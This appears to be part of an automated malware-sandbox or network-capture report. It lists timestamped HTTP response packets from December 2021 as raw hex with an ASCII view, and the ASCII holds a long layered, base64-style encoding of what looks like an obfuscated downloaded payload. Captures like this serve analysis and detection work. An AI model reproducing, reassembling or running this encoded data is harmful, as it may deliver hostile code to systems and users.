                                                                2021-12-02 20:47:22 UTC192INData Raw: 32 4c 47 41 31 52 69 78 67 4e 45 4d 73 59 44 42 44 4c 47 42 47 4e 79 78 67 4e 55 59 73 59 45 51 77 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 51 34 4c 47 41 31 4d 69 78 67 4d 30 55 73 59 44 59 77 4c 47 42 43 52 53 78 67 4f 54 51 73 59 44 59 7a 4c 47 42 46 51 79 78 67 52 45 59 73 59 45 59 30 4c 47 42 45 4e 79 78 67 52 44 67 73 59 45 5a 46 4c 47 41 34 52 43 78 67 51 7a 6b 73 59 44 63 33 4c 47 41 79 4e 79 78 67 52 55 55 73 59 45 5a 47 4c 47 41 77 4e 53 78 67 4e 30 59 73 59 45 5a 44 4c 47 42 42 52 69 78 67 4f 44 4d 73 59 44 52 47 4c 47 41 33 52 53 78 67 51 6b 51 73 59 45 59 30 4c 47 42 42 51 69 78 67 4d 30 59 73 59 45 59 31 4c 47 42 44 52 69 78 67 4e 30 51 73 59 45 59 34 4c 47 41 31 51 69 78 67 52 6b 55 73 59 44 41 32 4c 47 42 43 52 69 78 67 52 6a 6b 73 59 44
                                                                Data Ascii: 2LGA1RixgNEMsYDBDLGBGNyxgNUYsYEQwLGBGRixgRkYsYDQ4LGA1MixgM0UsYDYwLGBCRSxgOTQsYDYzLGBFQyxgREYsYEY0LGBENyxgRDgsYEZFLGA4RCxgQzksYDc3LGAyNyxgRUUsYEZGLGAwNSxgN0YsYEZDLGBBRixgODMsYDRGLGA3RSxgQkQsYEY0LGBBQixgM0YsYEY1LGBDRixgN0QsYEY4LGA1QixgRkUsYDA2LGBCRixgRjksYD
                                                                2021-12-02 20:47:22 UTC192INData Raw: 4c 47 42 43 52 53 78 67 51 54 4d 73 59 44 64 47 4c 47 42 47 4e 43 78 67 4d 55 59 73 59 45 4e 46 4c 47 41 33 52 69 78 67 4f 55 59 73 59 44 4e 44 4c 47 41 30 51 69 78 67 4f 55 59 73 59 45 52 47 4c 47 42 47 52 69 78 67 4d 6a 55 73 59 45 5a 47 4c 47 41 30 52 43 78 67 4e 55 45 73 59 45 5a 46 4c 47 42 46 4e 69 78 67 51 6b 59 73 59 45 55 79 4c 47 41 79 52 69 78 67 4e 45 45 73 59 45 5a 47 4c 47 41 35 4f 53 78 67 51 30 59 73 59 45 56 46 4c 47 42 47 52 53 78 67 4e 7a 55 73 59 44 51 30 4c 47 42 47 52 69 78 67 4d 54 63 73 59 45 5a 47 4c 47 42 47 51 69 78 67 4d 30 59 73 59 44 63 78 4c 47 41 35 51 79 78 67 51 6b 55 73 59 45 5a 43 4c 47 42 45 4d 79 78 67 52 6b 59 73 59 45 52 44 4c 47 41 33 52 69 78 67 52 6b 51 73 59 45 59 33 4c 47 41 79 4e 69 78 67 52 54 4d 73 59 45 5a
                                                                Data Ascii: LGBCRSxgQTMsYDdGLGBGNCxgMUYsYENFLGA3RixgOUYsYDNDLGA0QixgOUYsYERGLGBGRixgMjUsYEZGLGA0RCxgNUEsYEZFLGBFNixgQkYsYEUyLGAyRixgNEEsYEZGLGA5OSxgQ0YsYEVFLGBGRSxgNzUsYDQ0LGBGRixgMTcsYEZGLGBGQixgM0YsYDcxLGA5QyxgQkUsYEZCLGBEMyxgRkYsYERDLGA3RixgRkQsYEY3LGAyNixgRTMsYEZ
                                                                2021-12-02 20:47:22 UTC196INData Raw: 79 78 67 51 7a 55 73 59 45 51 32 4c 47 42 43 52 69 78 67 4d 7a 63 73 59 44 4a 45 4c 47 41 77 4d 53 78 67 52 6b 59 73 59 45 4a 42 4c 47 42 43 52 69 78 67 4e 30 51 73 59 44 4e 45 4c 47 42 45 4e 53 78 67 52 6a 45 73 59 45 5a 45 4c 47 42 45 4e 69 78 67 4d 30 59 73 59 44 55 31 4c 47 41 31 52 69 78 67 4e 7a 63 73 59 45 52 46 4c 47 41 7a 51 79 78 67 51 7a 49 73 59 44 6c 43 4c 47 41 33 52 69 78 67 52 55 45 73 59 44 46 47 4c 47 41 35 52 69 78 67 52 6b 55 73 59 45 56 47 4c 47 42 46 4f 53 78 67 52 45 59 73 59 45 59 30 4c 47 42 47 4e 69 78 67 52 55 59 73 59 45 59 34 4c 47 41 34 52 43 78 67 52 6b 51 73 59 44 4d 33 4c 47 41 33 52 69 78 67 51 7a 63 73 59 45 52 47 4c 47 42 47 51 79 78 67 52 44 63 73 59 45 59 35 4c 47 41 32 52 43 78 67 52 55 45 73 59 45 52 47 4c 47 41 30
                                                                Data Ascii: yxgQzUsYEQ2LGBCRixgMzcsYDJELGAwMSxgRkYsYEJBLGBCRixgN0QsYDNELGBENSxgRjEsYEZELGBENixgM0YsYDU1LGA1RixgNzcsYERFLGAzQyxgQzIsYDlCLGA3RixgRUEsYDFGLGA5RixgRkUsYEVGLGBFOSxgREYsYEY0LGBGNixgRUYsYEY4LGA4RCxgRkQsYDM3LGA3RixgQzcsYERGLGBGQyxgRDcsYEY5LGA2RCxgRUEsYERGLGA0
                                                                2021-12-02 20:47:22 UTC200INData Raw: 49 73 59 45 4a 47 4c 47 41 79 51 69 78 67 52 6a 41 73 59 45 52 46 4c 47 42 42 52 69 78 67 4d 54 4d 73 59 45 55 7a 4c 47 41 7a 52 43 78 67 4e 7a 67 73 59 44 46 47 4c 47 41 33 4e 79 78 67 4d 6a 6b 73 59 44 55 31 4c 47 42 45 52 53 78 67 52 54 6b 73 59 45 55 34 4c 47 41 78 52 69 78 67 52 6b 51 73 59 44 45 31 4c 47 42 45 4e 43 78 67 52 44 45 73 59 45 51 7a 4c 47 41 30 52 69 78 67 52 6b 59 73 59 45 4e 47 4c 47 42 47 52 69 78 67 4d 7a 67 73 59 45 5a 45 4c 47 42 43 4e 79 78 67 4e 30 59 73 59 45 5a 42 4c 47 42 45 52 69 78 67 4d 45 55 73 59 45 51 32 4c 47 41 79 4e 69 78 67 4d 30 55 73 59 44 41 31 4c 47 41 7a 4d 53 78 67 4d 30 55 73 59 45 5a 45 4c 47 42 42 4f 53 78 67 52 6b 45 73 59 44 6c 47 4c 47 42 46 52 53 78 67 51 6b 4d 73 59 45 59 78 4c 47 41 79 4e 79 78 67 52
                                                                Data Ascii: IsYEJGLGAyQixgRjAsYERFLGBBRixgMTMsYEUzLGAzRCxgNzgsYDFGLGA3NyxgMjksYDU1LGBERSxgRTksYEU4LGAxRixgRkQsYDE1LGBENCxgRDEsYEQzLGA0RixgRkYsYENGLGBGRixgMzgsYEZELGBCNyxgN0YsYEZBLGBERixgMEUsYEQ2LGAyNixgM0UsYDA1LGAzMSxgM0UsYEZELGBBOSxgRkEsYDlGLGBFRSxgQkMsYEYxLGAyNyxgR
                                                                2021-12-02 20:47:22 UTC204INData Raw: 78 4c 47 41 77 52 69 78 67 4d 44 6b 73 59 45 4d 32 4c 47 41 33 4d 79 78 67 52 6b 45 73 59 45 56 44 4c 47 41 79 52 69 78 67 51 54 45 73 59 44 63 32 4c 47 41 77 4e 79 78 67 4f 55 59 73 59 45 51 79 4c 47 41 78 52 69 78 67 52 54 6b 73 59 45 56 47 4c 47 42 47 4d 69 78 67 52 54 63 73 59 45 5a 47 4c 47 41 34 4e 53 78 67 4e 30 59 73 59 44 55 32 4c 47 42 47 51 53 78 67 52 55 51 73 59 45 52 47 4c 47 42 43 4e 53 78 67 4e 54 6b 73 59 44 67 32 4c 47 41 33 4e 69 78 67 4f 45 45 73 59 45 52 44 4c 47 42 46 4d 53 78 67 4e 30 59 73 59 45 59 35 4c 47 41 79 4e 79 78 67 4d 7a 41 73 59 45 45 7a 4c 47 41 77 4f 53 78 67 52 55 4d 73 59 45 51 30 4c 47 42 43 52 69 78 67 52 45 55 73 59 44 6b 35 4c 47 42 45 4d 53 78 67 52 54 63 73 59 44 41 34 4c 47 41 33 51 79 78 67 4e 30 55 73 59 45
                                                                Data Ascii: xLGAwRixgMDksYEM2LGA3MyxgRkEsYEVDLGAyRixgQTEsYDc2LGAwNyxgOUYsYEQyLGAxRixgRTksYEVGLGBGMixgRTcsYEZGLGA4NSxgN0YsYDU2LGBGQSxgRUQsYERGLGBCNSxgNTksYDg2LGA3NixgOEEsYERDLGBFMSxgN0YsYEY5LGAyNyxgMzAsYEEzLGAwOSxgRUMsYEQ0LGBCRixgREUsYDk5LGBEMSxgRTcsYDA4LGA3QyxgN0UsYE
                                                                2021-12-02 20:47:22 UTC209INData Raw: 52 53 78 67 4f 55 51 73 59 44 4d 33 4c 47 41 33 52 69 78 67 4d 54 4d 73 59 45 4a 44 4c 47 42 47 4f 53 78 67 51 6a 63 73 59 45 5a 46 4c 47 42 47 52 53 78 67 4f 55 59 73 59 45 5a 46 4c 47 41 33 4e 79 78 67 52 54 6b 73 59 44 46 47 4c 47 42 47 51 79 78 67 52 6b 4d 73 59 44 46 47 4c 47 42 47 4d 43 78 67 4e 6a 4d 73 59 44 67 33 4c 47 42 45 52 69 78 67 52 6a 49 73 59 44 49 35 4c 47 42 45 4d 69 78 67 4e 44 59 73 59 44 51 32 4c 47 41 30 51 53 78 67 4f 55 59 73 59 45 5a 46 4c 47 41 31 4e 43 78 67 52 6b 51 73 59 45 52 47 4c 47 41 33 4e 69 78 67 52 45 55 73 59 45 5a 44 4c 47 42 45 4e 79 78 67 4d 54 41 73 59 44 45 77 4c 47 42 45 4e 53 78 67 51 6b 59 73 59 45 55 34 4c 47 41 30 52 69 78 67 52 6b 49 73 59 44 4e 45 4c 47 42 45 4d 69 78 67 4e 55 59 73 59 44 63 31 4c 47 42
                                                                Data Ascii: RSxgOUQsYDM3LGA3RixgMTMsYEJDLGBGOSxgQjcsYEZFLGBGRSxgOUYsYEZFLGA3NyxgRTksYDFGLGBGQyxgRkMsYDFGLGBGMCxgNjMsYDg3LGBERixgRjIsYDI5LGBEMixgNDYsYDQ2LGA0QSxgOUYsYEZFLGA1NCxgRkQsYERGLGA3NixgREUsYEZDLGBENyxgMTAsYDEwLGBENSxgQkYsYEU4LGA0RixgRkIsYDNELGBEMixgNUYsYDc1LGB
                                                                2021-12-02 20:47:22 UTC224INData Raw: 4c 47 41 33 52 53 78 67 52 6a 63 73 59 45 52 47 4c 47 42 47 4d 43 78 67 4e 7a 63 73 59 44 67 34 4c 47 41 32 4d 43 78 67 52 6a 49 73 59 45 56 43 4c 47 41 78 4d 43 78 67 4f 54 67 73 59 45 4a 47 4c 47 41 34 4d 53 78 67 4d 7a 41 73 59 45 59 35 4c 47 41 31 4d 79 78 67 52 54 6b 73 59 45 55 33 4c 47 41 30 52 69 78 67 4d 6b 49 73 59 45 49 7a 4c 47 41 78 52 53 78 67 52 6b 4d 73 59 44 41 35 4c 47 42 47 4e 43 78 67 4e 45 59 73 59 45 5a 42 4c 47 41 34 4e 79 78 67 52 6b 4d 73 59 45 55 77 4c 47 41 77 52 69 78 67 52 6b 45 73 59 44 42 47 4c 47 42 45 4d 79 78 67 4e 55 59 73 59 45 56 47 4c 47 41 34 52 69 78 67 52 6b 49 73 59 44 64 45 4c 47 42 47 52 43 78 67 4e 7a 41 73 59 45 56 42 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 45 45 31 4c 47 42 47 52 69 78 67 4d 44 63 73 59 45 55
                                                                Data Ascii: LGA3RSxgRjcsYERGLGBGMCxgNzcsYDg4LGA2MCxgRjIsYEVCLGAxMCxgOTgsYEJGLGA4MSxgMzAsYEY5LGA1MyxgRTksYEU3LGA0RixgMkIsYEIzLGAxRSxgRkMsYDA5LGBGNCxgNEYsYEZBLGA4NyxgRkMsYEUwLGAwRixgRkEsYDBGLGBEMyxgNUYsYEVGLGA4RixgRkIsYDdELGBGRCxgNzAsYEVBLGAzNyxgRkUsYEE1LGBGRixgMDcsYEU
                                                                2021-12-02 20:47:22 UTC225INData Raw: 52 69 78 67 51 30 49 73 59 44 56 47 4c 47 41 79 4e 79 78 67 52 6b 51 73 59 45 4e 45 4c 47 42 42 52 53 78 67 4e 6a 63 73 59 45 4a 47 4c 47 42 42 4e 79 78 67 52 6a 41 73 59 45 4d 32 4c 47 42 42 52 69 78 67 52 6b 49 73 59 45 56 43 4c 47 42 47 52 69 78 67 52 54 59 73 59 45 4a 47 4c 47 42 44 52 53 78 67 4e 45 59 73 59 45 5a 45 4c 47 42 46 4e 69 78 67 51 6b 59 73 59 44 4a 46 4c 47 41 79 52 43 78 67 51 30 45 73 59 44 67 79 4c 47 42 44 51 69 78 67 51 6b 59 73 59 44 67 31 4c 47 41 7a 4f 53 78 67 52 6a 67 73 59 44 59 33 4c 47 42 44 4d 79 78 67 4d 7a 6b 73 59 45 59 34 4c 47 41 7a 4d 79 78 67 4f 45 55 73 59 44 4e 46 4c 47 42 47 52 53 78 67 4e 6a 4d 73 59 44 64 46 4c 47 42 44 4d 79 78 67 4e 55 59 73 59 44 4e 47 4c 47 42 47 52 43 78 67 4d 55 49 73 59 45 5a 47 4c 47 42
                                                                Data Ascii: RixgQ0IsYDVGLGAyNyxgRkQsYENELGBBRSxgNjcsYEJGLGBBNyxgRjAsYEM2LGBBRixgRkIsYEVCLGBGRixgRTYsYEJGLGBDRSxgNEYsYEZELGBFNixgQkYsYDJFLGAyRCxgQ0EsYDgyLGBDQixgQkYsYDg1LGAzOSxgRjgsYDY3LGBDMyxgMzksYEY4LGAzMyxgOEUsYDNFLGBGRSxgNjMsYDdFLGBDMyxgNUYsYDNGLGBGRCxgMUIsYEZGLGB
                                                                2021-12-02 20:47:22 UTC241INData Raw: 4e 79 78 67 51 6b 59 73 59 45 51 35 4c 47 42 42 52 69 78 67 4f 55 59 73 59 45 5a 46 4c 47 41 7a 52 43 78 67 52 6b 59 73 59 45 4e 45 4c 47 41 33 52 69 78 67 52 6a 51 73 59 45 52 47 4c 47 42 47 51 53 78 67 51 55 59 73 59 45 5a 44 4c 47 42 44 52 53 78 67 51 6b 59 73 59 45 51 32 4c 47 41 78 52 69 78 67 4f 44 51 73 59 45 4d 78 4c 47 42 47 52 53 78 67 52 54 59 73 59 45 4a 44 4c 47 41 32 4e 43 78 67 52 6b 51 73 59 45 51 33 4c 47 41 33 4e 69 78 67 4e 55 55 73 59 45 5a 43 4c 47 41 31 51 69 78 67 52 6a 45 73 59 45 52 42 4c 47 41 7a 52 69 78 67 52 6b 55 73 59 45 46 47 4c 47 41 79 52 43 78 67 4e 45 55 73 59 45 51 79 4c 47 42 47 52 69 78 67 52 6b 49 73 59 44 56 43 4c 47 42 47 52 69 78 67 52 45 45 73 59 44 64 47 4c 47 42 46 52 53 78 67 51 6b 59 73 59 45 59 32 4c 47 41
                                                                Data Ascii: NyxgQkYsYEQ5LGBBRixgOUYsYEZFLGAzRCxgRkYsYENELGA3RixgRjQsYERGLGBGQSxgQUYsYEZDLGBDRSxgQkYsYEQ2LGAxRixgODQsYEMxLGBGRSxgRTYsYEJDLGA2NCxgRkQsYEQ3LGA3NixgNUUsYEZCLGA1QixgRjEsYERBLGAzRixgRkUsYEFGLGAyRCxgNEUsYEQyLGBGRixgRkIsYDVCLGBGRixgREEsYDdGLGBFRSxgQkYsYEY2LGA
                                                                2021-12-02 20:47:22 UTC256INData Raw: 4c 47 42 47 4e 69 78 67 52 45 49 73 59 44 63 32 4c 47 42 47 4e 43 78 67 52 45 45 73 59 45 46 47 4c 47 42 47 52 69 78 67 4d 55 49 73 59 45 5a 44 4c 47 42 43 4e 69 78 67 51 6b 59 73 59 45 4e 47 4c 47 42 46 52 69 78 67 52 6b 55 73 59 44 46 43 4c 47 42 47 52 43 78 67 51 7a 6b 73 59 45 51 35 4c 47 41 79 52 69 78 67 4e 7a 41 73 59 44 68 45 4c 47 41 33 52 69 78 67 4f 54 63 73 59 45 52 47 4c 47 42 46 4e 53 78 67 52 6a 63 73 59 44 6c 47 4c 47 42 47 51 79 78 67 52 45 55 73 59 45 4a 47 4c 47 41 7a 4d 53 78 67 52 54 45 73 59 44 52 43 4c 47 42 45 4f 53 78 67 51 6a 51 73 59 45 4a 47 4c 47 42 43 4d 69 78 67 4f 44 4d 73 59 45 56 47 4c 47 42 46 52 69 78 67 4f 44 67 73 59 44 42 46 4c 47 42 47 52 53 78 67 4f 45 49 73 59 45 59 7a 4c 47 42 43 51 69 78 67 52 6b 59 73 59 44 52
                                                                Data Ascii: LGBGNixgREIsYDc2LGBGNCxgREEsYEFGLGBGRixgMUIsYEZDLGBCNixgQkYsYENGLGBFRixgRkUsYDFCLGBGRCxgQzksYEQ5LGAyRixgNzAsYDhELGA3RixgOTcsYERGLGBFNSxgRjcsYDlGLGBGQyxgREUsYEJGLGAzMSxgRTEsYDRCLGBEOSxgQjQsYEJGLGBCMixgODMsYEVGLGBFRixgODgsYDBFLGBGRSxgOEIsYEYzLGBCQixgRkYsYDR
                                                                2021-12-02 20:47:22 UTC272INData Raw: 4c 47 42 43 52 69 78 67 4e 7a 4d 73 59 45 5a 43 4c 47 41 78 52 69 78 67 52 6b 55 73 59 44 4a 46 4c 47 42 46 4f 53 78 67 4d 55 59 73 59 45 59 77 4c 47 41 34 52 69 78 67 4e 45 59 73 59 45 56 46 4c 47 42 47 51 53 78 67 4d 6b 59 73 59 44 5a 46 4c 47 41 33 4d 69 78 67 4d 6a 49 73 59 45 5a 47 4c 47 42 47 4f 53 78 67 4d 45 55 73 59 44 6b 30 4c 47 41 78 4d 53 78 67 51 54 41 73 59 45 5a 44 4c 47 41 77 52 53 78 67 52 6b 59 73 59 45 59 7a 4c 47 41 31 52 69 78 67 52 6b 55 73 59 45 4a 43 4c 47 42 42 4e 53 78 67 52 6b 59 73 59 45 59 31 4c 47 41 33 52 69 78 67 52 6a 6b 73 59 45 56 43 4c 47 42 47 52 43 78 67 4d 45 59 73 59 44 4e 46 4c 47 41 78 4e 43 78 67 4f 54 63 73 59 45 4e 47 4c 47 42 47 4f 43 78 67 4e 45 59 73 59 44 4e 43 4c 47 42 46 52 69 78 67 52 6b 4d 73 59 44 5a
                                                                Data Ascii: LGBCRixgNzMsYEZCLGAxRixgRkUsYDJFLGBFOSxgMUYsYEYwLGA4RixgNEYsYEVFLGBGQSxgMkYsYDZFLGA3MixgMjIsYEZGLGBGOSxgMEUsYDk0LGAxMSxgQTAsYEZDLGAwRSxgRkYsYEYzLGA1RixgRkUsYEJCLGBBNSxgRkYsYEY1LGA3RixgRjksYEVCLGBGRCxgMEYsYDNFLGAxNCxgOTcsYENGLGBGOCxgNEYsYDNCLGBFRixgRkMsYDZ
                                                                2021-12-02 20:47:22 UTC288INData Raw: 4c 47 41 31 4f 43 78 67 4d 55 59 73 59 45 5a 44 4c 47 41 33 4f 53 78 67 51 7a 67 73 59 44 68 43 4c 47 41 7a 52 53 78 67 52 6b 4d 73 59 44 5a 45 4c 47 42 47 52 69 78 67 4f 54 51 73 59 44 64 47 4c 47 41 79 52 43 78 67 52 6b 51 73 59 45 51 33 4c 47 42 47 52 69 78 67 52 45 49 73 59 44 64 47 4c 47 42 47 4e 53 78 67 51 6a 63 73 59 45 59 79 4c 47 42 43 51 69 78 67 4f 45 45 73 59 45 55 31 4c 47 42 43 4e 43 78 67 4e 30 55 73 59 44 51 35 4c 47 42 42 4e 79 78 67 4f 55 49 73 59 45 52 47 4c 47 41 77 52 69 78 67 52 45 51 73 59 45 5a 44 4c 47 42 46 4e 69 78 67 4e 44 67 73 59 45 55 78 4c 47 42 46 52 43 78 67 52 6b 51 73 59 44 41 32 4c 47 42 46 4f 53 78 67 4e 30 59 73 59 45 59 34 4c 47 41 77 4e 79 78 67 4e 45 51 73 59 44 49 33 4c 47 41 31 4d 43 78 67 4d 45 49 73 59 45 4a
                                                                Data Ascii: LGA1OCxgMUYsYEZDLGA3OSxgQzgsYDhCLGAzRSxgRkMsYDZELGBGRixgOTQsYDdGLGAyRCxgRkQsYEQ3LGBGRixgREIsYDdGLGBGNSxgQjcsYEYyLGBCQixgOEEsYEU1LGBCNCxgN0UsYDQ5LGBBNyxgOUIsYERGLGAwRixgREQsYEZDLGBFNixgNDgsYEUxLGBFRCxgRkQsYDA2LGBFOSxgN0YsYEY4LGAwNyxgNEQsYDI3LGA1MCxgMEIsYEJ
                                                                2021-12-02 20:47:22 UTC304INData Raw: 4c 47 42 47 52 43 78 67 4e 54 4d 73 59 44 64 46 4c 47 42 46 4e 53 78 67 51 6b 59 73 59 45 59 32 4c 47 41 33 51 69 78 67 52 6b 49 73 59 45 56 47 4c 47 41 30 4e 79 78 67 52 44 59 73 59 44 46 47 4c 47 41 33 52 69 78 67 51 7a 63 73 59 45 4e 46 4c 47 42 44 51 69 78 67 51 6b 59 73 59 44 41 30 4c 47 41 79 52 69 78 67 52 6b 59 73 59 45 59 30 4c 47 42 43 51 69 78 67 52 6b 59 73 59 45 59 30 4c 47 41 7a 4e 79 78 67 4e 45 45 73 59 44 64 47 4c 47 41 35 4e 79 78 67 51 6b 59 73 59 45 56 43 4c 47 41 33 52 69 78 67 52 6b 59 73 59 45 49 31 4c 47 42 47 51 79 78 67 4f 54 63 73 59 45 52 45 4c 47 41 35 51 53 78 67 4e 44 55 73 59 44 56 44 4c 47 41 35 4d 43 78 67 51 6b 51 73 59 45 49 31 4c 47 41 77 51 79 78 67 4e 30 59 73 59 45 4d 35 4c 47 42 46 4d 69 78 67 4e 6b 55 73 59 45 45
                                                                Data Ascii: LGBGRCxgNTMsYDdFLGBFNSxgQkYsYEY2LGA3QixgRkIsYEVGLGA0NyxgRDYsYDFGLGA3RixgQzcsYENFLGBDQixgQkYsYDA0LGAyRixgRkYsYEY0LGBCQixgRkYsYEY0LGAzNyxgNEEsYDdGLGA5NyxgQkYsYEVCLGA3RixgRkYsYEI1LGBGQyxgOTcsYERELGA5QSxgNDUsYDVDLGA5MCxgQkQsYEI1LGAwQyxgN0YsYEM5LGBFMixgNkUsYEE
                                                                2021-12-02 20:47:22 UTC320INData Raw: 4c 47 42 46 52 69 78 67 4e 7a 59 73 59 45 51 33 4c 47 41 31 4e 79 78 67 4e 30 55 73 59 44 56 45 4c 47 41 33 4e 43 78 67 4e 7a 41 73 59 45 59 79 4c 47 41 31 52 69 78 67 52 6b 55 73 59 44 68 42 4c 47 42 45 52 69 78 67 4d 7a 4d 73 59 45 5a 45 4c 47 41 32 52 69 78 67 4e 30 59 73 59 44 6c 47 4c 47 41 31 52 69 78 67 52 54 63 73 59 44 6c 47 4c 47 42 47 4e 79 78 67 4d 30 49 73 59 45 59 34 4c 47 41 35 4e 69 78 67 4e 44 51 73 59 45 55 32 4c 47 42 43 52 69 78 67 52 6a 6b 73 59 45 46 47 4c 47 41 31 4d 79 78 67 52 6b 51 73 59 44 41 78 4c 47 41 33 4f 43 78 67 52 54 55 73 59 45 51 33 4c 47 42 42 4e 53 78 67 4e 54 63 73 59 45 4a 46 4c 47 41 30 4e 53 78 67 4d 6b 4d 73 59 45 59 35 4c 47 41 30 4e 79 78 67 4f 44 63 73 59 44 4e 45 4c 47 42 47 52 43 78 67 52 54 4d 73 59 44 51
                                                                Data Ascii: LGBFRixgNzYsYEQ3LGA1NyxgN0UsYDVELGA3NCxgNzAsYEYyLGA1RixgRkUsYDhBLGBERixgMzMsYEZELGA2RixgN0YsYDlGLGA1RixgRTcsYDlGLGBGNyxgM0IsYEY4LGA5NixgNDQsYEU2LGBCRixgRjksYEFGLGA1MyxgRkQsYDAxLGA3OCxgRTUsYEQ3LGBBNSxgNTcsYEJFLGA0NSxgMkMsYEY5LGA0NyxgODcsYDNELGBGRCxgRTMsYDQ
                                                                2021-12-02 20:47:22 UTC336INData Raw: 4c 47 41 78 4f 53 78 67 52 6a 55 73 59 45 59 33 4c 47 42 44 4e 79 78 67 4e 54 45 73 59 44 46 47 4c 47 42 43 52 69 78 67 4d 54 63 73 59 45 5a 45 4c 47 42 47 52 69 78 67 4e 7a 4d 73 59 44 67 79 4c 47 42 47 4d 79 78 67 4e 54 63 73 59 45 51 7a 4c 47 42 47 4e 79 78 67 52 6b 59 73 59 44 49 30 4c 47 42 46 4d 53 78 67 52 6b 45 73 59 44 67 79 4c 47 42 45 52 53 78 67 52 6b 59 73 59 44 5a 43 4c 47 42 46 4f 53 78 67 4f 55 51 73 59 44 6c 47 4c 47 41 79 4d 53 78 67 4e 7a 67 73 59 45 56 47 4c 47 42 46 4f 43 78 67 52 55 59 73 59 45 5a 47 4c 47 41 35 4e 43 78 67 51 6b 55 73 59 45 4a 47 4c 47 41 30 51 69 78 67 52 6a 41 73 59 45 5a 46 4c 47 41 32 4e 79 78 67 52 6b 45 73 59 45 5a 45 4c 47 41 33 4e 79 78 67 51 54 45 73 59 45 59 78 4c 47 41 33 52 43 78 67 4f 54 63 73 59 45 5a
                                                                Data Ascii: LGAxOSxgRjUsYEY3LGBDNyxgNTEsYDFGLGBCRixgMTcsYEZELGBGRixgNzMsYDgyLGBGMyxgNTcsYEQzLGBGNyxgRkYsYDI0LGBFMSxgRkEsYDgyLGBERSxgRkYsYDZCLGBFOSxgOUQsYDlGLGAyMSxgNzgsYEVGLGBFOCxgRUYsYEZGLGA5NCxgQkUsYEJGLGA0QixgRjAsYEZFLGA2NyxgRkEsYEZELGA3NyxgQTEsYEYxLGA3RCxgOTcsYEZ
                                                                2021-12-02 20:47:22 UTC352INData Raw: 4c 47 42 47 52 69 78 67 4d 7a 4d 73 59 45 5a 46 4c 47 41 35 51 69 78 67 4f 44 4d 73 59 45 4d 35 4c 47 42 44 4d 69 78 67 4e 55 59 73 59 45 52 45 4c 47 41 77 4d 53 78 67 52 6a 45 73 59 45 46 47 4c 47 41 79 4d 53 78 67 4e 54 6b 73 59 45 59 35 4c 47 41 30 52 69 78 67 51 55 55 73 59 45 5a 46 4c 47 42 42 4f 43 78 67 4e 30 59 73 59 44 4a 47 4c 47 42 47 52 43 78 67 4f 54 63 73 59 45 5a 47 4c 47 42 43 51 69 78 67 52 6b 59 73 59 45 59 77 4c 47 41 31 4e 79 78 67 52 6a 6b 73 59 44 49 77 4c 47 41 34 4e 69 78 67 52 54 4d 73 59 45 51 30 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 45 4e 47 4c 47 41 77 4f 53 78 67 4e 6a 45 73 59 45 5a 44 4c 47 41 30 4f 53 78 67 4f 44 41 73 59 45 59 78 4c 47 41 35 51 69 78 67 52 6b 59 73 59 45 49 7a 4c 47 42 47 52 69 78 67 52 55 51 73 59 44 52
                                                                Data Ascii: LGBGRixgMzMsYEZFLGA5QixgODMsYEM5LGBDMixgNUYsYERELGAwMSxgRjEsYEFGLGAyMSxgNTksYEY5LGA0RixgQUUsYEZFLGBBOCxgN0YsYDJGLGBGRCxgOTcsYEZGLGBCQixgRkYsYEYwLGA1NyxgRjksYDIwLGA4NixgRTMsYEQ0LGBERixgRkMsYENGLGAwOSxgNjEsYEZDLGA0OSxgODAsYEYxLGA5QixgRkYsYEIzLGBGRixgRUQsYDR
                                                                2021-12-02 20:47:22 UTC368INData Raw: 4c 47 41 77 51 79 78 67 51 54 63 73 59 45 59 79 4c 47 41 33 52 69 78 67 4e 44 6b 73 59 44 41 33 4c 47 42 42 4e 53 78 67 4e 30 59 73 59 44 46 47 4c 47 41 33 4f 53 78 67 51 7a 55 73 59 45 52 47 4c 47 42 47 52 53 78 67 4d 30 49 73 59 45 4e 45 4c 47 41 33 52 69 78 67 4f 54 59 73 59 45 5a 46 4c 47 42 42 4d 69 78 67 4d 30 59 73 59 45 59 35 4c 47 42 46 52 69 78 67 52 6a 67 73 59 44 42 47 4c 47 41 33 51 79 78 67 4d 54 67 73 59 44 41 7a 4c 47 42 43 4d 53 78 67 52 44 45 73 59 44 6c 47 4c 47 42 44 51 53 78 67 4d 44 41 73 59 44 46 44 4c 47 41 34 4d 43 78 67 4d 30 59 73 59 44 42 47 4c 47 41 77 4d 43 78 67 52 6b 55 73 59 45 49 79 4c 47 42 42 4e 79 78 67 52 6b 59 73 59 45 59 31 4c 47 41 30 4f 53 78 67 52 6b 45 73 59 44 5a 43 4c 47 42 47 52 53 78 67 51 6b 55 73 59 44 64
                                                                Data Ascii: LGAwQyxgQTcsYEYyLGA3RixgNDksYDA3LGBBNSxgN0YsYDFGLGA3OSxgQzUsYERGLGBGRSxgM0IsYENELGA3RixgOTYsYEZFLGBBMixgM0YsYEY5LGBFRixgRjgsYDBGLGA3QyxgMTgsYDAzLGBCMSxgRDEsYDlGLGBDQSxgMDAsYDFDLGA4MCxgM0YsYDBGLGAwMCxgRkUsYEIyLGBBNyxgRkYsYEY1LGA0OSxgRkEsYDZCLGBGRSxgQkUsYDd
                                                                2021-12-02 20:47:22 UTC384INData Raw: 4c 47 41 78 4e 79 78 67 4d 6a 4d 73 59 44 6b 35 4c 47 42 47 52 43 78 67 4e 30 59 73 59 45 4a 44 4c 47 42 47 4d 79 78 67 52 6a 49 73 59 44 4a 43 4c 47 42 43 51 79 78 67 52 6b 4d 73 59 45 4d 33 4c 47 42 43 52 53 78 67 52 6b 51 73 59 45 56 43 4c 47 41 33 4e 79 78 67 52 44 49 73 59 44 64 47 4c 47 42 47 4d 69 78 67 4f 55 59 73 59 45 5a 44 4c 47 42 45 4e 69 78 67 52 6b 59 73 59 45 55 34 4c 47 42 43 52 69 78 67 4e 6b 4d 73 59 45 59 79 4c 47 42 42 51 53 78 67 51 6b 59 73 59 45 56 45 4c 47 42 44 4d 43 78 67 4f 54 51 73 59 45 4d 31 4c 47 41 78 4e 69 78 67 51 6a 49 73 59 44 49 35 4c 47 42 42 52 43 78 67 52 6b 45 73 59 44 5a 47 4c 47 41 33 4e 79 78 67 4d 30 45 73 59 45 59 34 4c 47 41 35 52 69 78 67 4d 6a 6b 73 59 44 63 31 4c 47 41 31 4f 53 78 67 52 6b 59 73 59 44 68
